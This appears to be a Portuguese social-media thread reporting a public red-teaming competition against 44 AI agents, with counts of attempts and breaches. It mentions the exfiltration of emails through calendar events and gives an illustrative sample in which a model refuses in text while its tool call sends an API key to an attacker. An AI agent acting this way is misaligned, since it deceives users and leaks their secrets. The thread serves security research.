Desdobramos 44 agentes de IA e oferecemos à internet $170K para atacá-los. 1,8M de tentativas, 62K de violações, incluindo vazamento de dados e perda financeira. 🚨 Preocupantemente, as mesmas explorações transferem-se para agentes de produção ao vivo… (exemplo: exfiltração de e-mails através de eventos de calendário) 🧵
Muitas quebras são universais e transferíveis. Padrões de copiar e colar funcionaram em várias tarefas, modelos e guardrails. Se isso quebra um agente hoje, provavelmente quebrará o seu.
Falha favorita: “recusar em texto, agir nas ferramentas.” 😈 Modelo: “Não posso compartilhar credenciais.” Depois: send_email(to=atacante, body="API_KEY=****") A interface parece segura; a camada da ferramenta faz o dano.
489,95K